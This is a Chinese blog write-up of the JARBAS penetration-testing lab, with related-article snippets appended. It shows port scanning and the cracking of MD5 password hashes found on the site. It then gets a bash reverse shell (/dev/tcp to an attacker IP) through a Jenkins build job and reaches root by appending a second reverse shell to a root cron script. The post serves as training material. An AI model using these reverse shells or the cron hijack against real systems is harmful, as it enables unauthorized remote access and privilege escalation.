JARBAS - Jenkins渗透原理详解

最新推荐文章于 2024-06-21 18:07:04 发布
最新推荐文章于 2024-06-21 18:07:04 发布
阅读量775 收藏 5
点赞数 6
分类专栏: 红队打靶 文章标签: jenkins 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82000839/article/details/139337624
版权

qrcode_for_gh_e5fc05804a3e_430

nmap端口扫描

主机发现

image-20240530200757038

创建文件夹进行保存扫描记录

指定最低1万速率扫描所有端口

image-20240530201203565

提取端口

image-20240530203609257

详细扫描

image-20240530203720238

脚本扫描

image-20240530204205753

web渗透

image-20240530205352254

脚本扫描里有robots;去看一下

image-20240530205439598

# we don't want robots to click "build" links
User-agent: *
Disallow: /

先目录爆破80端口

没有信息

image-20240530205838528

另一个扫描工具

也没有任何发现

image-20240530205951450

点击网站;看有没有啥提示

我们再指定一下扩展名

image-20240530210326309

可以看到access.html

老黑兄弟来帮忙提示了

以安全的方式加密的信用证!

image-20240530210420062

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

如果不知道编码方式可以使用hash-identifier来识别一下

就是md5

image-20240530210639921

解码

tiago:italia99
trindade:marianna
eder:vipsu

使用第三个账户密码登录成功

image-20240530211423133

我们应该是获得了更高的一个访问权限

Jenkins是一套著名内容管理系统;持续集成工具

了解不了解关系不大;但是我们需要懂得bug利用方式

简单点击查看管理系统功能

image-20240530232547453

获得初级系统权限

创建一个任务;填写名称;确定

第一个执行windows p 处理命令;因为扫描过程中,我们知道这个不是windows

第二个执行shell ;我们就用它

image-20240530232919589

这样我们写shell脚本

/bin/bash -i >& /dev/tcp/192.168.218.145/4444 0>&1

就需要我们在kali中开启监听4444端口

保存;理论上来说我们构建的反弹shell,点击立即构建就能够让kali收到一个反弹shell

image-20240530233621129

好,看kali中已经返回shell;同时上图也显示正在执行的任务

image-20240530233717584

crontab系统提权

正常查看下版本;用户;组;sudo -l权限; sudo提权没戏,那就看passwd

image-20240530234009762

查看下有哪些用户;目前我们的用户bash环境不太稳定,shadow无权查看

eder;root

我们就在其他提权路线做些尝试

image-20240530234139575

先看一下系统有没有自动任务吧

一般是/etc/crontab;最下面有一条记录,应该是每五分钟以root权限执行

/etc/script/CleaningScript.sh把他扔掉

少数也有cron.d

image-20240530234820505

内容很简单,貌似是删除返回日志;反正这个文件是由root权限

image-20240530235236759

将payload加入到root权限的文件夹里;先在kali中开启监听,因为我们不知道5分钟目前到哪了

echo “/bin/bash -i >& /dev/tcp/192.168.218.145/4443 0>&1” >> /etc/script/CleaningScript.sh

#因为我们看到root那边后缀有bash环境的,将payload追加到/etc/script/CleaningScript.sh

现在等待五分钟看能不能成功吧

image-20240531000558960

总结

打靶正常的思路,先nmap扫,tcp、udp全扫一遍,防止漏掉信息

80优先思路、22ssh爆破放最后

普通扫目录无信息、根据网站信息猜测、再指定扫描测试

对编码进行hash-id识别、解码、利用信息尝试登录

要么是ssh登录、要么是8080的登录;进行尝试

进入网站登录后利用jenkins常用的漏洞、写linux执行的bash环境payload进行反弹shell

权限比较低;无权查看shadow;sudo也没思路;查看自启任务有root权限

写入poc;5分钟自动进入了root权限

这个靶机就被完全结束了

实战与靶场是不同的,靶场只是学习思路,有时写入我们还需要ls -laih查看有无写入权限等

进入网站登录后利用jenkins常用的漏洞、写linux执行的bash环境payload进行反弹shell

权限比较低;无权查看shadow;sudo也没思路;查看自启任务有root权限

写入poc;5分钟自动进入了root权限

这个靶机就被完全结束了

实战与靶场是不同的,靶场只是学习思路,有时写入我们还需要ls -laih查看有无写入权限等

lu-fe1
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
jenkins execute shell不执行_Jenkins 后台Getshsell Jenkins漏洞复现系列(完结)
weixin_35832025的博客
01-13 1402
一、漏洞简介:Jenkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。漏洞原因:jenkins 未设置帐号密码,或者使用了弱帐号密码二、漏洞复现:访问:target/manage,如果有未授权的话就直接可以进入如下界...
记一次域渗透实战思路分享
潇湘信安的博客
04-19 413
前几天帮朋友搞了一个域,很久没有搞域了感觉都快忘的差不多了,不过还好最终还是打穿了这个域,不过应朋友要求就不以文章形式来写了,简单的整理了下思路和测试过程中遇到的一些问题和解决方法分享给大家,希望大家能够从中有所收获!应朋友的要求就不写文章了,整理了下思路和测试过程中遇到的一些问题和解决方法分享给大家。
红队打靶:JARBAS详细打靶思路(vulnhub)
Bossfrank的博客
06-03 1498
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
Jenkins弱口令RCE复现渗透测试
kelenwait的博客
06-20 2759
简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。 漏洞复现 1.jenkins存在默认口令使用弱口令登录 admin/admin123 2.找到 Manage Jenkins -Tools and Actions - Script Console 点击
干货丨渗透测试常用方法总结,大神之笔!
m0_61869253的博客
03-18 1441
一般先运行端口扫描和漏洞扫描获取可以利用的漏洞。多利用搜索引擎有授权的情况下直接使用 nmap 、masscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。使用 Python 端口扫描的介绍https://thief.one/2018/05/17/1/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.ioWindows 下基于 Powershell 的端口扫描脚本。
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 538
Jenkins远程命令执行漏洞(CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
PyPI 官网下载 | jarbas_hive_mind-0.3.5.tar.gz
02-01
资源来自pypi官网。 资源全名:jarbas_hive_mind-0.3.5.tar.gz
论文研究 - 加强高中地理制图的使用
05-19
首先,根据Jarbas Passarinho School高中2年级学生研究的教科书内容,这项工作基于针对性文献综述,通过使用人造卫星(Google Earth)的图像开展实际活动来开展。 在进行此类活动时,已经注意到学生和老师在处理...
jarbasmedeiros
03-07
你好呀 :waving_hand: 我是Jarbas Medeiros 后端开发人员 :seedling: 我目前正在学习有关Java和Spring Boot的更多信息 :closed_mailbox_with_raised_flag: 如何联系我: 语言和框架 操作系统和工具 关于我
渗透测试常用方法总结
MzHeader的博客
06-19 1万+
1 渗透流程 信息收集 漏洞验证/漏洞攻击 提权,权限维持 日志清理 其他 1 信息收集 一般先运行端口扫描和漏洞扫描获取可以利用的漏洞。多利用搜索引擎 端口扫描 有授权的情况下直接使用 nmap 、msscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。 使用 Python 端口扫描的介绍 https://thief.one/2018/05/17/1...
【介绍两款SSH爆破工具 hydra+medusa】
热门推荐
UNITY3D游戏引擎技术专家
04-11 1万+
安装hydra wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz tar zxf hydra-6.3-src.tar.gz cd hydra-6.3-src ./configure make make install 使用hydra
jenkins弱口令漏洞
WY92139010的博客
08-03 1413
jenkins弱口令漏洞 一、漏洞描述 通过暴力破解管理控制台,如果爆破成功,可获得后台管理权限。操作后台,后台可通过脚本命令行功能执行系统命令,如反弹shell等,低权限可以通过创建控制台输出方式执行命令。 二、漏洞环境搭建 1、 官方下载jenkins-2.50-1.1.noarch.rpm,下载地址: http://mirrors.jenkins.io 2、在redhat...
Jenkins远程命令执行漏洞(CVE-2018-1000861)
锋刃科技的博客
06-06 5549
1. 漏洞简介 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令 2. 影响组件 Jenkins 3. 漏洞指纹 Jenkins 4. Fofa Dork app="Jenkins" 5. 漏洞分析 这里我们是用docker快速搭建 git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/jenkins/CVE-2018-1000861 docker-compose
Jenkins远程命令执行漏洞(CVE-2018-1000861)
黑白的博客
12-07 2736
声明 好好学习,天天向上 漏洞描述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 影
Jenkins弱口令扫描器
weixin_34162629的博客
08-01 609
Jenkins是一个开源软件项目,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。 默认地Jenkins不包含任何的安全检查,如果未做好权限控制,可以通过其中一个未授权的命令执行获取服务器权限。当然如果配置了授权访问和资源访问权限设置,也可以批量抓取用户名进行暴力破解(有可能产生告警信息)。 由于Jenkins版本不同,因此抓取用户列表的CG...
Jenkins 任意文件读取漏洞分析
qcloud_security的博客
07-26 2318
一、漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 日的安全通告修复了多个漏洞,其中 SECURITY-914 是由 Orange (博客链接:http://blog.orange.tw/)挖出的 Jenkins 未授权任意文件读取漏洞。 腾讯安全云鼎实验室安全研究人员对该漏洞进行分析发现,利用这个漏洞,攻击者可以读取 Windows 服...
Jenkins-2.283 破解密码
weixin_38920945的博客
03-22 789
浏览器输入 http://192.168.100.100:8080 发现无法登录 那我们需要怎么获取密码重新登录呢? 去JENKINS_HOME/user/admin目录下找到config.xml文件<hudson.security.HudsonPrivateSecurityRealm_-Details><passwordHash>#jbcrypt:$...
绕过前端加密进行爆破(附脚本)
Matthew
11-20 5025
渗透的过程中,有时候会遇到密码在前端加密了,为我们爆破提高了难度。加密是js脚本自定义函数加密,burp里面的一些加密函数就满足不了我们的需求。如下所示,密码为admin123,加密的效果如下: 可以看到加密的函数主要是encode,所以每个密码都由自定义函数加密。最近在实战过程中get到一个new trick,利用相应的工具或者模块执行该 js 文件,拿到输出结果即可,可以使用 python 自
Jenkins RCE CVE-2016-0788分析及利用
Exploit的小站~
05-10 5956
Before Read 本文是去年乌云关站前夕在drops上发表的,但是之后的事情大家都知道,非常仓促,估计很多爬虫没有收录此文,我的blog上居然也没有留下,所以特地翻出来备份一下。 0x00 概述 国外的安全研究人员Moritz Bechler在2月份发现了一处Jenkins远程命令执行漏洞,该漏洞无需登录即可利用,也就是CVE-2016-0788。官方公告是这样描述此漏洞的: ...
ElasticSearch-Windows系统ElasticSearch(ES)的下载及安装
最新发布
努力搬砖,顶峰相见
06-21 368
可以进入ElasticSearch官方下载地址,选择与电脑系统相对应的版本,本次演示版本为8.14.1。注意:Elasticsearch 5 需要 Java 8 以上版本;Elasticsearch 6.5 开始支持 Java 11;Elasticsearch 7.0 开始,内置了 Java 环境,因此若安装7.0以上版本,可以不需要安装JDK。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lu-fe1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值